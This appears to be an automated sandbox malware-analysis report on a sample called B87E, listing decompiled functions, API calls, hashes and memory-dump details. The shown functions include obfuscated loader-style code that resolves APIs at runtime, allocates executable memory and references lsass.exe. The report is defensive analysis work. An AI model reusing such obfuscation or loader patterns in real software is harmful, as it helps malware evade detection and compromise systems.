                      Uniqueness Score: -1.00%

                      Function 023E87C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 408 23e87c6-23e87df 409 23e87e1-23e87e3 408->409 410 23e87ea-23e87f6 CreateToolhelp32Snapshot 409->410 411 23e87e5 409->411 412 23e87f8-23e87fe 410->412 413 23e8806-23e8813 Module32First 410->413 411->410 412->413 420 23e8800-23e8804 412->420 414 23e881c-23e8824 413->414 415 23e8815-23e8816 call 23e8485 413->415 418 23e881b 415->418 418->414 420->409 420->413
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 023E87EE
                      • Module32First.KERNEL32(00000000,00000224), ref: 023E880E
                      Memory Dump Source
                      • Source File: 00000005.00000002.464999094.00000000023E8000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E8000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_23e8000_B87E.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFirstModule32SnapshotToolhelp32
                      • String ID:
                      • API String ID: 3833638111-0
                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction ID: cc61f6cfc88c8c24e32eea9a53cb11f2ef3dc131a506dc2434f8a616833a649f
                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction Fuzzy Hash: 59F09631A007206FEB203BF5A88DB6E76E8EF49725F100528E653910D0DB70E8494A61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004B0FC1 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      APIs
                      • GetFileAttributesW.KERNELBASE ref: 004B0FC1
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: ea58a405e0e64d76220aa99920a66b1d17324ea2a26ce2c55647758112df9357
                      • Instruction ID: e3fa7fa5c656face5c45343ba49ac4d476067e0fe277372c006e33e024eae605
                      • Opcode Fuzzy Hash: ea58a405e0e64d76220aa99920a66b1d17324ea2a26ce2c55647758112df9357
                      • Instruction Fuzzy Hash: 43C08CE46C030A3BEB00BA90DC89DEE2A2DF3A079A7600092B00052399E1ED0E0AC621
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 023E8485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 023E84D6
                      Memory Dump Source
                      • Source File: 00000005.00000002.464999094.00000000023E8000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E8000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_23e8000_B87E.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction ID: 97df89b2b5c8da8d371074010e7a64a2550c0dd84c9582624b788322eaead317
                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction Fuzzy Hash: D1113C79A00208EFDB01DF98C985E99BBF5AF08350F058094F9499B3A1D771EA90DF80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004A65E7 Relevance: 1.3, APIs: 1, Instructions: 25memoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 720bdd5f8cd7e541af80946f824cbe9d96bc3af9c2ff3d0fc841d06cc1575041
                      • Instruction ID: 02d7f321e7fdefe4bd1ed0070f40cb9c968c27eec82114a5b8485830186f0776
                      • Opcode Fuzzy Hash: 720bdd5f8cd7e541af80946f824cbe9d96bc3af9c2ff3d0fc841d06cc1575041
                      • Instruction Fuzzy Hash: 90E02B64D1024207EB006F79DA4C1CD3FB0EB3A328F451469C49097358C23900059F65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004AE906 Relevance: 1.3, APIs: 1, Instructions: 21COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004AE906(intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				CHAR* _v12;
				CHAR* _v16;
				CHAR* _t14;

				_v16 = 0;
				_t14 = _a8 + _a8;
				_v8 = _t14;
				_v12 = _t14;
				E004A646A(_v12); // executed
				_v16 = _t14;
				E004AE896(_v16, _a4, _a8);
				CharUpperBuffA(_v16, _v8); // executed
				return _v16;
			}







                      0x004ae90c
                      0x004ae916
                      0x004ae918
                      0x004ae91b
                      0x004ae921
                      0x004ae926
                      0x004ae932
                      0x004ae93d
                      0x004ae947

                      APIs
                      • CharUpperBuffA.USER32(00000000,?,?), ref: 004AE93D
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID:
                      • API String ID: 3964851224-0
                      • Opcode ID: f7aa4290a1d4c696bbc81596abc1dda2888b84ec69a4d61fca0ff3e4a580dcb1
                      • Instruction ID: 1da07d6b28ad723244748cd8f4b962ad1cc17d3ab7f28c4ff61efcb80d9f995b
                      • Opcode Fuzzy Hash: f7aa4290a1d4c696bbc81596abc1dda2888b84ec69a4d61fca0ff3e4a580dcb1
                      • Instruction Fuzzy Hash: B6F0AE35C00208BFCF01AFA9DC41A8CBBB1EF14318F10C1A5E924A6260D7368A64AF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00507020 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00507020(int __edx) {
				void* _t1;

				if(__edx != 0) {
					_t1 = malloc(__edx); // executed
					return _t1;
				} else {
					return 0;
				}
			}




                      0x00507022
                      0x00507028
                      0x00507030
                      0x00507024
                      0x00507026
                      0x00507026

                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: malloc
                      • String ID:
                      • API String ID: 2803490479-0
                      • Opcode ID: e7e52364a65551d2f2e863f5fa4d91097504cf4f39efa7ba4035d1c28b1b6513
                      • Instruction ID: 843bc1800a2f380bf3025d0414cd7774c4182b6f6c8e25964212e7e79e675822
                      • Opcode Fuzzy Hash: e7e52364a65551d2f2e863f5fa4d91097504cf4f39efa7ba4035d1c28b1b6513
                      • Instruction Fuzzy Hash: 47A011CEE2008000EA082032280202B202232E0A0BBE8EAB8A800800A8FE3CE008200A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Function 0049BC94 Relevance: 37.2, APIs: 1, Strings: 20, Instructions: 474libraryloaderCOMMONCrypto
                      Download Yara Rule
                      C-Code - Quality: 47%
                      			E0049BC94(void* __ebx, short __ecx, short __edx, void* __edi, void* __esi, void* __eflags) {
				signed char _t106;
				signed char _t108;
				signed char _t116;
				unsigned int _t119;
				signed char _t126;
				signed char _t132;
				signed char _t142;
				signed char _t144;
				signed char _t147;
				_Unknown_base(*)()* _t151;
				signed char _t159;
				unsigned int _t170;
				signed char _t189;
				intOrPtr _t205;
				signed char _t206;
				signed char _t216;
				intOrPtr _t233;
				intOrPtr _t260;
				short _t265;
				short _t266;
				short _t267;
				intOrPtr _t269;
				void* _t270;
				void* _t271;
				void* _t272;
				signed char _t274;
				void* _t276;
				signed char _t278;
				void* _t290;
				short _t296;
				signed int _t297;
				unsigned short _t300;
				signed short _t302;
				void* _t313;
				void* _t315;
				void* _t320;
				signed int _t322;
				void* _t324;
				signed short _t326;
				signed int _t329;
				signed short _t331;
				void* _t335;
				void* _t367;

				_t324 = __esi;
				_t313 = __edi;
				_t296 = __edx;
				_t265 = __ecx;
				L00468D9F(__ebx, __edx, __edi, __esi, 1, 1);
				_t266 = _t265;
				_t106 =  *(_t335 - 8);
				if(_t106 >= 0x8d42f) {
					L4:
					 *0x5091d2 = _t296;
					_t297 = 0;
					 *0x509254 =  *0x509254 - _t324;
					 *0x50bf14 = _t106;
					_t159 = _t106;
					_push( *0x5090b6);
					 *0x50bf15 = _t106;
					_t315 = _t313 - 0xeb7d;
					 *0x509510 = _t106;
					if(_t106 != 0x1bb3) {
						L8:
						 *0x50bf14 =  *0x50bf14 - _t106;
						L9:
						_t324 = 0;
						 *(_t335 - 0x10) = "api-ms-win-core-namedpipe-l1-1-0.dll";
						L10:
						_t170 = "NtSetDriverEntryOrder";
						_t267 = 0;
						_push( *0x50914c);
						 *((intOrPtr*)(_t335 - 0x18)) = _t170;
						if(_t170 != _t170) {
							_t267 = 0x64c0;
							 *0x50917a = 0x64c0;
						}
						 *(_t335 - 8) = _t106;
						_t108 =  *(_t335 - 8);
						 *(_t335 - 0x10) = _t108;
						_push( *0x5090ec);
						if(_t267 < _t267) {
							L14:
							_t297 = _t297 + 0x8dbc12;
							 *0x50921c = _t297;
							goto L15;
						} else {
							_t267 = 0;
							if((_t297 & 0x0078854b) < 0) {
								L15:
								 *0x50bf14 = _t108;
								_push( *0x509062);
								 *0x50bf13 = _t108;
								_t326 = _t324 + _t324;
								if(_t315 + _t315 >= 0) {
									 *0x50bf17 = _t108;
									 *0x50bf17 = _t108;
									 *(_t335 - 0xc) = _t108;
								}
								 *(_t335 - 8) = _t108;
								 *0x50915a = _t267;
								_t269 =  *0x50915c; // 0x61a0
								_t270 = _t269 + 0x6e2043;
								 *0x5091c0 = _t297;
								_t116 =  *(_t335 - 8);
								_push( *0x509116);
								if(_t270 == _t270) {
									_t270 = 0x84c3;
									 *0x50a7c8 =  *0x50a7c8 - _t297;
									_t297 = _t297 - 0xa44d;
									if((_t326 & 0x0000ac2f) >= 0) {
										 *0x50bf13 = _t116;
									}
								}
								if(_t326 < 0) {
								}
								 *0x50bf17 = _t116;
								_push( *0x509158);
								 *(_t335 - 8) = _t116;
								if(_t116 + _t116 >= 0x28) {
									 *((intOrPtr*)(_t335 - 0x14)) =  *((intOrPtr*)(_t335 - 0x14)) - 0xdf042;
								}
								_t271 = _t270 + 1;
								 *0x50bf0e =  *0x50bf0e - _t271;
								_t272 = _t271 + _t271;
								_t299 = 0x8ebc;
								 *0x5091ea = 0x8ebc;
								_t119 = "normaliz.dll";
								if(_t119 >= 0x2506c7) {
									_t272 = _t272 - 0x64ab1b;
									 *0x50919e = 0x8ebc;
									_t299 = 0x9f8d;
									_t326 = 0;
									 *0x50bf15 = _t119 + 0xd2;
								}
								_t189 =  *(_t335 - 0xc);
								 *0x5090a0 =  *0x5090a0 - _t189;
								 *0x5090b8 =  *0x5090b8 + _t189;
								 *0x50908a =  *0x50908a + _t189 + _t189;
								_push( *0x5090ec);
								_t274 = _t272 + _t272 + 1;
								_t300 = _t299 >> _t274;
								_t126 =  *(_t335 - 8);
								if(0 < 0) {
									L30:
									 *0x509218 = _t300;
									_t326 = 0;
									goto L31;
								} else {
									_t290 = _t274 + 0x5423b0;
									if(_t290 < _t290 || _t290 < _t290) {
										_t300 =  *0x5091ca; // 0xa1e2
										goto L30;
									} else {
										L31:
										_push( *0x50902c);
										_t329 = _t326 + 0xbfe1de;
										_t320 = 0xfffffffffffe97ea;
										 *(_t335 - 8) = _t126;
										 *(_t335 - 0xc) = _t126;
										 *0x509154 =  *0x509154 + 0x60f2;
										_t132 =  *(_t335 - 8);
										if(0x512e >= 0x2b) {
											 *0x50bf0e =  *0x50bf0e + 0x42ac66;
											if(0x60f2 >= 0x60f2) {
												 *0x5091be = _t300;
											}
										}
										 *(_t335 - 8) = _t132;
										_push( *0x509174);
										_t205 = 0x50;
										_t276 = 0x5667;
										if("lsass.exe" < 0x2824) {
											_t205 =  *((intOrPtr*)(_t335 - 0x14));
											if(_t205 < _t205) {
												 *((intOrPtr*)(_t335 - 0x1c)) = _t205;
											}
											_t367 = _t276;
										}
										_t278 = 0x76fc;
										_t302 = 0xa111 >> 0x76fc;
										_t142 = E005002EA(_t205, 0x76fc, 0xa111 >> 0x76fc, _t320, _t367);
										 *0x50bf14 = _t142;
										_t206 =  *0x50bf15; // 0x0
										_t322 = _t320 - 0xd5b8cd >> 0x76fc;
										 *(_t335 - 8) = _t142;
										_t144 =  *(_t335 - 8);
										if(_t206 + _t142 <= 0x25e035) {
											L43:
											if(_t322 < 0x3da) {
												goto L45;
											}
											goto L44;
										} else {
											 *0x509124 = 0x76fc;
											_t278 = 0x73;
											 *0x50bf10 =  *0x50bf10 - 0x73;
											if(0x89 > 0) {
												L44:
												 *0x509040 =  *0x509040 - _t144;
												L45:
												 *(_t335 - 0xc) = _t144;
												L46:
												L47:
												 *(_t335 - 0x58) = _t144;
												 *(_t335 - 8) = _t144;
												L00468197(("ucmhc.dll" >> _t278) + ("ucmhc.dll" >> _t278), _t322, _t329, 1, 0);
												_t147 =  *(_t335 - 8);
												if(0x36d457 >= 0x36d457) {
													L50:
													_t329 = _t329 + 0xaf0abc;
													L51:
													 *0x50b95f =  *0x50b95f + _t329;
													 *0x50bf15 = _t147;
													L52:
													_push( *(_t335 - 0x58));
													if(_t147 <= 0x808) {
														L54:
														if(0x8152 != 0) {
															L63:
															_t331 =  !(_t329 + 0xa3b5d5);
															_push( *0x5093d4);
															_t216 = _t147;
															 *(_t335 - 8) = _t147;
															if(_t147 <= 0x1aef) {
																L69:
																 *0x50bf07 = _t147;
																 *((intOrPtr*)(_t335 - 0x1c)) =  *((intOrPtr*)(_t335 - 0x1c));
																 *(_t335 - 0x20) =  *(_t335 - 0x20) + _t278;
																L70:
																_t151 = GetProcAddress();
																if((_t331 & 0x0000b2d4) != 0) {
																	L73:
																	if((_t331 & 0x0000abfd) > 0) {
																	}
																	 *0x50965a =  *0x50965a - _t322;
																	L76:
																	 *0x509744 = _t151;
																	 *(_t335 - 8) = _t151;
																	 *(_t335 - 0x10) = 0x1dc7a2;
																	_push(0);
																	_push(0x3a10ab);
																	_push(E0049C36F);
																	_push(L00468D9F);
																	return 0x1dc7a2;
																}
																_t331 = _t331 + 0xca7b;
																 *0x50bf15 = _t151;
																if(_t322 < 0) {
																	goto L76;
																}
																 *(_t335 - 8) = _t151;
																goto L73;
															}
															_t233 = _t216 - 0x3296;
															if(_t233 != 0x347170) {
																goto L70;
															}
															 *((intOrPtr*)(_t335 - 0x1c)) = _t233;
															if(0x61e5 < 0x61e5) {
																goto L70;
															}
															_t278 = 0;
															if(0 < 0) {
																 *0x5091f2 =  *0x5091f2;
															}
															 *0x50bf14 = 0xcc;
															_t322 = _t322 + 0xd00321;
															_t147 = 0xf4;
															goto L69;
														}
														_t329 = 0xcd24;
														if((_t147 & _t147) < 0) {
															L62:
															goto L63;
														}
														if(_t322 >= 0) {
															L61:
															 *0x50a94c =  *0x50a94c + 0x873a;
															goto L62;
														}
														L58:
														 *0x5090d0 =  *0x5090d0 +  !( *(_t335 - 0xc) - 0x307f);
														if(_t278 >= _t278) {
															 *0x50916a = _t278;
														}
														goto L61;
													}
													 *(_t335 - 8) =  *(_t335 - 8) - _t147;
													 *(_t335 - 0x20) = _t278;
													_t278 = 0x6e87;
													 *0x50917e =  *0x50917e + 0x6e87;
													if((_t302 & 0x00008e11) != 0) {
														goto L58;
													}
													goto L54;
												}
												 *0x509192 = 0x648e;
												_t278 = 0xd8e1 + _t302;
												_t302 = _t302 + 0x849d2f;
												 *0x50bf11 =  *0x50bf11 + _t302;
												if((_t302 & 0x0000a3a1) < 0) {
													goto L52;
												}
												if((_t147 & 0x000000b6) >= 0) {
													goto L51;
												}
												goto L50;
											}
											_t302 = 0xa861;
											if((_t329 & 0x009e169b) != 0) {
												goto L47;
											}
											_t329 = _t329 - 0xb34d61;
											_t322 =  !_t322;
											if(_t144 >= 0) {
												goto L46;
											}
											goto L43;
										}
									}
								}
							}
							goto L14;
						}
					}
					_t260 = _t159 - 0xffffffffffd1f0ec;
					 *((intOrPtr*)(_t335 - 0x14)) = _t260;
					 *((intOrPtr*)(_t335 - 0x18)) = _t260;
					if(_t266 < _t266) {
						goto L10;
					}
					if(_t266 < _t266) {
						goto L9;
					}
					_t297 = 0x8a15;
					 *0x5091f4 = 0x8a15;
					goto L8;
				}
				 *((intOrPtr*)(_t335 - 0x14)) =  *(_t335 - 0xc) - 0x22 + 0x3144;
				if(0 > 0) {
					 *0x509154 = _t266;
				}
				_t266 =  *0x509184; // 0x875a
				goto L4;
			}














































                      0x0049bc94
                      0x0049bc94
                      0x0049bc94
                      0x0049bc94
                      0x0049bc98
                      0x0049bc9d
                      0x0049bc9f
                      0x0049bca7
                      0x0049bcd4
                      0x0049bcd4
                      0x0049bcdb
                      0x0049bce0
                      0x0049bce7
                      0x0049bced
                      0x0049bcef
                      0x0049bcf6
                      0x0049bd00
                      0x0049bd05
                      0x0049bd0e
                      0x0049bd41
                      0x0049bd4b
                      0x0049bd51
                      0x0049bd51
                      0x0049bd68
                      0x0049bd71
                      0x0049bd71
                      0x0049bd76
                      0x0049bd78
                      0x0049bd7f
                      0x0049bd84
                      0x0049bd8a
                      0x0049bd8e
                      0x0049bd8e
                      0x0049bd98
                      0x0049bda0
                      0x0049bda3
                      0x0049bda8
                      0x0049bdb2
                      0x0049bdc4
                      0x0049bdc4
                      0x0049bdca
                      0x00000000
                      0x0049bdb4
                      0x0049bdba
                      0x0049bdc2
                      0x0049bdd1
                      0x0049bddb
                      0x0049bde3
                      0x0049bdea
                      0x0049bdf0
                      0x0049bdf4
                      0x0049bdf6
                      0x0049bdfb
                      0x0049be0d
                      0x0049be0d
                      0x0049be12
                      0x0049be27
                      0x0049be5a
                      0x0049be61
                      0x0049be67
                      0x0049be77
                      0x0049be7a
                      0x0049be83
                      0x0049be8c
                      0x0049be90
                      0x0049be99
                      0x0049bea3
                      0x0049bea5
                      0x0049bea5
                      0x0049bea3
                      0x0049beae
                      0x0049beae
                      0x0049beb6
                      0x0049bec8
                      0x0049bed7
                      0x0049bede
                      0x0049bee0
                      0x0049bee0
                      0x0049beea
                      0x0049beeb
                      0x0049bef4
                      0x0049befb
                      0x0049beff
                      0x0049bf09
                      0x0049bf13
                      0x0049bf2b
                      0x0049bf31
                      0x0049bf38
                      0x0049bf3e
                      0x0049bf44
                      0x0049bf44
                      0x0049bf50
                      0x0049bf53
                      0x0049bf5a
                      0x0049bf6e
                      0x0049bf7e
                      0x0049bf87
                      0x0049bf88
                      0x0049bf9d
                      0x0049bfa2
                      0x0049bfbb
                      0x0049bfbb
                      0x0049bfc2
                      0x00000000
                      0x0049bfa4
                      0x0049bfa4
                      0x0049bfac
                      0x0049bfb4
                      0x00000000
                      0x0049bfc4
                      0x0049bfc4
                      0x0049bfca
                      0x0049bfd1
                      0x0049bfdd
                      0x0049bfe8
                      0x0049bfeb
                      0x0049c017
                      0x0049c026
                      0x0049c02c
                      0x0049c03b
                      0x0049c043
                      0x0049c048
                      0x0049c048
                      0x0049c043
                      0x0049c056
                      0x0049c070
                      0x0049c08a
                      0x0049c08d
                      0x0049c09d
                      0x0049c09f
                      0x0049c0a4
                      0x0049c0a6
                      0x0049c0a6
                      0x0049c0a9
                      0x0049c0a9
                      0x0049c0b0
                      0x0049c0b4
                      0x0049c0bd
                      0x0049c0c2
                      0x0049c0c8
                      0x0049c0d4
                      0x0049c0d9
                      0x0049c0e1
                      0x0049c0ea
                      0x0049c12d
                      0x0049c132
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0049c0ec
                      0x0049c0f6
                      0x0049c0ff
                      0x0049c102
                      0x0049c10b
                      0x0049c134
                      0x0049c134
                      0x0049c13b
                      0x0049c13b
                      0x0049c13e
                      0x0049c141
                      0x0049c14b
                      0x0049c14e
                      0x0049c15c
                      0x0049c166
                      0x0049c16b
                      0x0049c19a
                      0x0049c19a
                      0x0049c1a0
                      0x0049c1a0
                      0x0049c1a6
                      0x0049c1ab
                      0x0049c1b0
                      0x0049c1b9
                      0x0049c1e9
                      0x0049c1f3
                      0x0049c247
                      0x0049c24d
                      0x0049c24f
                      0x0049c255
                      0x0049c257
                      0x0049c25e
                      0x0049c2a7
                      0x0049c2a7
                      0x0049c2bc
                      0x0049c2bf
                      0x0049c2c5
                      0x0049c2d1
                      0x0049c2dc
                      0x0049c30d
                      0x0049c322
                      0x0049c322
                      0x0049c332
                      0x0049c33c
                      0x0049c33f
                      0x0049c34d
                      0x0049c355
                      0x0049c361
                      0x0049c363
                      0x0049c364
                      0x0049c369
                      0x0049c36e
                      0x0049c36e
                      0x0049c2de
                      0x0049c2e3
                      0x0049c2f2
                      0x00000000
                      0x00000000
                      0x0049c2f4
                      0x00000000
                      0x0049c304
                      0x0049c260
                      0x0049c26b
                      0x00000000
                      0x00000000
                      0x0049c26d
                      0x0049c279
                      0x00000000
                      0x00000000
                      0x0049c27b
                      0x0049c282
                      0x0049c284
                      0x0049c284
                      0x0049c296
                      0x0049c29e
                      0x0049c2a4
                      0x00000000
                      0x0049c2a4
                      0x0049c1f9
                      0x0049c200
                      0x0049c245
                      0x00000000
                      0x0049c245
                      0x0049c204
                      0x0049c238
                      0x0049c23c
                      0x00000000
                      0x0049c242
                      0x0049c214
                      0x0049c221
                      0x0049c22c
                      0x0049c22e
                      0x0049c22e
                      0x00000000
                      0x0049c22c
                      0x0049c1bb
                      0x0049c1cf
                      0x0049c1d5
                      0x0049c1d9
                      0x0049c1e7
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0049c1e7
                      0x0049c179
                      0x0049c180
                      0x0049c182
                      0x0049c188
                      0x0049c193
                      0x00000000
                      0x00000000
                      0x0049c198
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0049c198
                      0x0049c10f
                      0x0049c119
                      0x00000000
                      0x00000000
                      0x0049c11d
                      0x0049c125
                      0x0049c129
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0049c12b
                      0x0049c0ea
                      0x0049bfac
                      0x0049bfa2
                      0x00000000
                      0x0049bdc2
                      0x0049bdb2
                      0x0049bd13
                      0x0049bd19
                      0x0049bd1c
                      0x0049bd2b
                      0x00000000
                      0x00000000
                      0x0049bd32
                      0x00000000
                      0x00000000
                      0x0049bd38
                      0x0049bd3a
                      0x00000000
                      0x0049bd3a
                      0x0049bcb4
                      0x0049bcbc
                      0x0049bcc3
                      0x0049bcc3
                      0x0049bccd
                      0x00000000

                      APIs
                      • GetProcAddress.KERNEL32(?,00000001), ref: 0049C2D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: 5%$CNBP_335.DLL$CoLockObjectExternal$HMETAFILEPICT_UserSize$NtSetDriverEntryOrder$RtlReleaseRelativeName$TpCaptureCaller$WinFax.dll$aaclient.dll$api-ms-win-core-namedpipe-l1-1-0.dll$api-ms-win-core-string-l1-1-0.dll$dpnet.dll$lsass.exe$mscpxl32.dLL$normaliz.dll$pq4$ucmhc.dll$wuapi.dll$~s%$`}
                      • API String ID: 190572456-863654116
                      • Opcode ID: 629826b7226e4e9d1bc20083de35d664cd8bc5f485080b46df7a5a4c3f0e4930
                      • Instruction ID: 025a65e1e4ef756207230300738e2dc6a2e3dee9295441304cf7cffa52657546
                      • Opcode Fuzzy Hash: 629826b7226e4e9d1bc20083de35d664cd8bc5f485080b46df7a5a4c3f0e4930
                      • Instruction Fuzzy Hash: 8102ED75E402468BCB00DFB9E8D82CD7FB1EB3A314F48457AC944A7366E3380949DB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004E828B Relevance: 23.1, Strings: 18, Instructions: 611COMMON
                      Download Yara Rule
                      C-Code - Quality: 69%
                      			E004E828B(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				signed int _t128;
				signed int _t129;
				signed int _t132;
				signed int _t134;
				signed int _t137;
				signed int _t140;
				signed int _t142;
				signed int _t143;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				intOrPtr _t156;
				intOrPtr _t162;
				char* _t180;
				signed int _t199;
				char* _t205;
				void* _t221;
				intOrPtr _t248;
				void* _t251;
				signed int _t252;
				intOrPtr _t257;
				signed int _t258;
				signed int _t301;
				signed int _t304;
				short _t305;
				signed int _t308;
				signed int _t309;
				signed int _t311;
				short _t314;
				signed int _t322;
				signed int _t340;
				short _t342;
				signed int _t343;
				signed int _t350;
				signed int _t352;
				void* _t361;
				short _t365;
				intOrPtr _t368;
				short _t373;
				signed int _t374;
				signed short _t386;
				intOrPtr* _t389;
				short _t390;
				signed int _t392;
				void* _t393;
				void* _t395;
				signed int _t399;
				short _t400;
				signed int _t401;
				signed int _t415;
				signed int _t418;
				void* _t419;
				void* _t435;
				void* _t436;
				signed short _t438;
				short _t439;
				signed int _t442;
				void* _t443;
				intOrPtr _t452;
				void* _t459;

				 *0x5090ce =  *0x5090ce + __ebx;
				 *(_t459 - 0xc) =  *( *(_t459 - 0xc) + 0x24);
				_t162 =  *0x509d08; // 0x0
				 *0x50a060 = _t162;
				_t301 =  *(_t459 - 0xc);
				_t418 = _t301;
				 *(_t459 - 0xc) = _t301;
				 *(_t459 - 8) =  *(_t459 - 8) + _t418;
				 *0x509ff0 = 0x4515fe;
				_t304 =  *0x509160; // 0xeb4
				_t305 = _t304 - 0x7c56;
				 *0x5091ac = _t305;
				_t361 = 0xa3c2;
				 *0x509de0 = "OSProvider.dll";
				 *0x509166 = _t305;
				_t128 =  *(_t459 - 8);
				 *(_t459 - 0x2c) = _t128;
				_t308 =  *(_t459 - 0xc);
				 *(_t459 - 0x20) = 0xffffffff;
				 *(_t459 - 0xc) = _t308;
				if(_t308 > _t308) {
					 *0x50bf13 =  *0x50bf13 - _t128;
					 *0x50bf13 =  *0x50bf13 + _t128;
				}
				 *0x50bf15 =  *0x50bf15 + _t128;
				 *0x50bf17 = _t128;
				 *0x50bf17 = _t128;
				_t309 =  *(_t459 - 0xc);
				_t129 =  *(_t459 - 0x30);
				 *(_t459 - 8) = _t129;
				if(0x3f6052 >= 0x3f6052) {
					_t415 =  !(_t361 - _t309 - _t309 + 0xe40e);
					if((_t415 & 0x007f04a6) < 0) {
						_t415 = _t415 + 0x94d8d1;
						 *0x50bf13 = _t129;
						 *0x50bf15 = _t129;
						_t418 = _t418 + _t418;
						if(_t129 > 0) {
						}
					}
					 *0x509e14 = 0x322bad;
					_t361 = _t415 + _t309 + 0x673f;
					 *0x509180 = _t309;
				}
				 *(_t459 - 0xc) = _t309;
				 *(_t459 - 8) =  *( *(_t459 - 8) + 0x18);
				_t180 = 0x514453;
				_t132 =  *(_t459 - 8);
				_t311 =  *(_t459 - 0xc);
				 *(_t459 - 0x24) = _t132;
				 *0x50bf12 = _t132;
				_t419 = _t418 + 1;
				 *0x50bf15 = _t132;
				if(_t419 <= 0) {
					L14:
					 *0x509160 = _t311;
					 *0x50917a = _t311;
				} else {
					if(_t132 != 0) {
						 *0x50955c =  *0x50955c + _t132;
					}
					_t180 = "IMCCPHR.exe";
					if(_t180 <= _t180) {
						_t180 =  &(_t180[0x56]);
						goto L14;
					}
				}
				_t365 =  *0x5091ac; // 0xa184
				 *0x5091fa = _t365;
				 *0x50bf14 = _t132;
				if( *(_t459 - 0x24) != 0) {
					 *0x509026 =  *0x509026 + _t132;
					 *(_t459 - 0xc) =  *(_t459 - 0x4c);
					_t340 =  *(_t459 - 0xc);
					_t146 =  *(_t459 - 0x1c);
					 *(_t459 - 0xc) = _t340;
					if(_t340 >= _t340) {
						_t340 = 0x7cb6;
						 *0x50a6a4 =  *0x50a6a4;
						 *0x50bf13 = _t146;
						if(_t146 >= 0) {
							 *0x50bf15 = _t146;
							 *0x50bf17 = _t146;
						}
					}
					if(_t146 <= 0x1bee96) {
						 *0x50bf0b =  *0x50bf0b - 0x31255d;
					}
					_t342 =  *0x509132; // 0xcae6
					 *0x50917e = _t342;
					_t343 =  *(_t459 - 0xc);
					_t386 =  *(_t459 - 0x28);
					_t438 = _t386;
					if((_t386 & 0x0000a639) == 0) {
						 *0x50bf13 = _t146;
					}
					 *0x50962c =  *0x50962c - _t419;
					 *0x509648 =  *0x509648 + _t419;
					_t439 = _t438 - _t343;
					 *(_t459 - 0xc) = _t343;
